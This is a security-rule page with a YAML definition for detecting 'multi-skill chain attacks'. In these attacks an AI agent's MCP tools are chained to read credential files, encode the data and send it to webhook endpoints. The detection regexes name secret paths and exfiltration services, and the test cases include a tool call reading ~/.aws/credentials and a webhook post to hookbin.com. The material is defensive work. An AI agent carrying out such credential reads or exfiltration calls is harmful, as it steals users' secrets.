Skip to content
ATR-2026-00063criticalSkill 入侵experimental

Multi-Skill Chain Attack

Detects attack sequences where multiple MCP skills are chained together to achieve a malicious outcome that no single skill could accomplish alone. For example: (1) a reconnaissance skill reads sensitive files, (2) an encoding skill obfuscates the data, (3) a network skill exfiltrates it. Each step appears benign individually but the chain constitutes data exfiltration.

嚴重度
critical
類別
Skill 入侵
掃描目標
mcp
作者
ATR Community

建議回應

block toolalertsnapshotescalate

參考資料

OWASP Agentic
ASI02:2026 - Tool Misuse and Exploitation
OWASP LLM
LLM03:2025 - Supply Chain VulnerabilitiesLLM06:2025 - Excessive Agency
MITRE ATLAS
AML.T0024 - Exfiltration via AI Inference APIAML.T0053 - AI Agent Tool Invocation

實地驗證

驗證日期
2026-04-08
樣本數
53,577
誤報率(實地語料)
0%

偵測條件

組合方式: any
  1. 01
    Sensitive file/credential access patterns (path-specific, not bare word 'credentials')
    欄位: tool_args運算子: regex
  2. 02
    欄位: tool_args運算子: regex
  3. 03
    欄位: tool_args運算子: regex
  4. 04
    欄位: tool_name運算子: regex

攻擊範例(規則會觸發)

  1. 觸發條件: reading sensitive credential file
    tool_name: file_reader
    tool_args: '{"path": "/home/user/.aws/credentials"}'
  2. 觸發條件: sending data to known exfiltration endpoint
    tool_name: send_webhook
    tool_args: '{"url": "https://hookbin.com/abc123", "data": "encoded_payload"}'

以上為真實攻擊 payload 的脫敏版本,與規則一同版本化,作為 regression test——確保未來的修訂不會悄悄漏掉它們。

正常樣本(規則不會觸發)

  1. tool_name: file_reader
    tool_args: '{"path": "/home/user/documents/report.pdf"}'
  2. tool_name: email_sender
    tool_args: '{"to": "[email protected]", "subject": "Meeting notes"}'

已知誤報情境

  • Legitimate backup or migration workflows that read, compress, and transfer files
  • CI/CD pipelines that encode artifacts for deployment
  • Monitoring tools that send alerts via webhooks

完整 YAML 定義

在 GitHub 編輯 →
title: "Multi-Skill Chain Attack"
id: ATR-2026-00063
rule_version: 1
status: experimental
description: >
  Detects attack sequences where multiple MCP skills are chained together to achieve
  a malicious outcome that no single skill could accomplish alone. For example:
  (1) a reconnaissance skill reads sensitive files, (2) an encoding skill obfuscates
  the data, (3) a network skill exfiltrates it. Each step appears benign individually
  but the chain constitutes data exfiltration.
author: "ATR Community"
date: "2026/03/08"
schema_version: "0.1"
detection_tier: pattern
maturity: test
severity: critical

references:
  owasp_llm:
    - "LLM03:2025 - Supply Chain Vulnerabilities"
    - "LLM06:2025 - Excessive Agency"
  owasp_agentic:
    - "ASI02:2026 - Tool Misuse and Exploitation"
  mitre_atlas:
    - "AML.T0024 - Exfiltration via AI Inference API"
    - "AML.T0053 - AI Agent Tool Invocation"

compliance:
  nist_ai_rmf:
    - subcategory: "MP.5.1"
      context: "Multi-skill chain attacks combine individually benign tool calls into a composite exfiltration or compromise sequence; MP.5.1 requires characterizing the likelihood and magnitude of impact for these emergent risks that only manifest when steps are correlated across skills."
      strength: primary
    - subcategory: "MG.2.3"
      context: "Detection of reconnaissance-then-encode-then-exfiltrate skill chains must trigger pre-defined risk treatment to disengage or quarantine the orchestration before the final exfiltration step completes; MG.2.3 mandates these supersede/deactivate mechanisms are in place."
      strength: secondary
    - subcategory: "GV.6.1"
      context: "Skill chains often span third-party MCP tools whose composed behavior is not covered by individual supplier risk reviews; GV.6.1 requires policies that address third-party AI/tool risks including emergent misuse across multiple suppliers."
      strength: secondary
    - subcategory: "MS.2.7"
      context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the skill supply-chain compromise (Multi-Skill Chain Attack)."
      strength: primary
    - subcategory: "MG.3.1"
      context: "NIST AI RMF MANAGE 3.1 (third-party resources regularly monitored) is supported where this rule detects the skill supply-chain compromise (Multi-Skill Chain Attack)."
      strength: secondary
    - subcategory: "MG.3.2"
      context: "NIST AI RMF MANAGE 3.2 (pre-trained models monitored as part of maintenance) is supported where this rule detects the skill supply-chain compromise (Multi-Skill Chain Attack)."
      strength: secondary
  iso_42001:
    - clause: "8.1"
      context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the skill supply-chain compromise (Multi-Skill Chain Attack)."
      strength: primary
    - clause: "8.3"
      context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) is supported by this rule, which implements runtime detection of the skill supply-chain compromise (Multi-Skill Chain Attack) as a treatment control."
      strength: secondary
  eu_ai_act:
    - article: "15"
      context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the skill supply-chain compromise (Multi-Skill Chain Attack)."
      strength: primary
    - article: "9"
      context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control that detects the skill supply-chain compromise (Multi-Skill Chain Attack)."
      strength: secondary
tags:
  category: tool-poisoning
  subcategory: skill-chain
  scan_target: mcp
  confidence: medium

agent_source:
  type: tool_call
  framework:
    - mcp
    - langchain
    - crewai
    - autogen
  provider:
    - any

detection:
  conditions:
    - field: tool_args
      operator: regex
      value: "(?i)(/etc/passwd|/etc/shadow|(?<![a-z])\\.(env|aws/credentials)|secrets?\\.json|private[_-]?key|id_rsa|kubeconfig)"
      description: "Sensitive file/credential access patterns (path-specific, not bare word 'credentials')"
    - field: tool_args
      operator: regex
      value: "(?i)(base64|btoa|encodeURI|hex\\.encode|rot13|xor|compress|gzip|deflate|encrypt)"
    - field: tool_args
      operator: regex
      value: "(?i)(webhook|ngrok|requestbin|pipedream|hookbin|burpcollaborator|interact\\.sh|oast)"
    - field: tool_name
      operator: regex
      value: "(?i)(send[_-]?(email|message|webhook|http|request)|upload|post[_-]?data|transmit|exfil)"
  condition: any
  false_positives:
    - "Legitimate backup or migration workflows that read, compress, and transfer files"
    - "CI/CD pipelines that encode artifacts for deployment"
    - "Monitoring tools that send alerts via webhooks"

response:
  actions:
    - block_tool
    - alert
    - snapshot
    - escalate
  auto_response_threshold: high
  message_template: >
    [ATR-2026-063] Potential skill chain attack detected. Tool call appears to be
    part of a multi-step attack sequence (reconnaissance -> encoding -> exfiltration).
    Review the full session tool call history.

confidence: 53
wild_validated: "2026/04/08"
wild_samples: 53577
wild_fp_rate: 0
test_cases:
  true_positives:
    - input:
        tool_name: "file_reader"
        tool_args: '{"path": "/home/user/.aws/credentials"}'
      expected: triggered
      matched_condition: "reading sensitive credential file"
    - input:
        tool_name: "send_webhook"
        tool_args: '{"url": "https://hookbin.com/abc123", "data": "encoded_payload"}'
      expected: triggered
      matched_condition: "sending data to known exfiltration endpoint"
  true_negatives:
    - input:
        tool_name: "file_reader"
        tool_args: '{"path": "/home/user/documents/report.pdf"}'
      expected: not_triggered
      reason: "Reading a normal user document"
    - input:
        tool_name: "email_sender"
        tool_args: '{"to": "[email protected]", "subject": "Meeting notes"}'
      expected: not_triggered
      reason: "Sending normal business email"

修訂歷史

建立於
2026-03-08
最後修改
2026-07-07
在 GitHub 查看完整 commit 歷史 →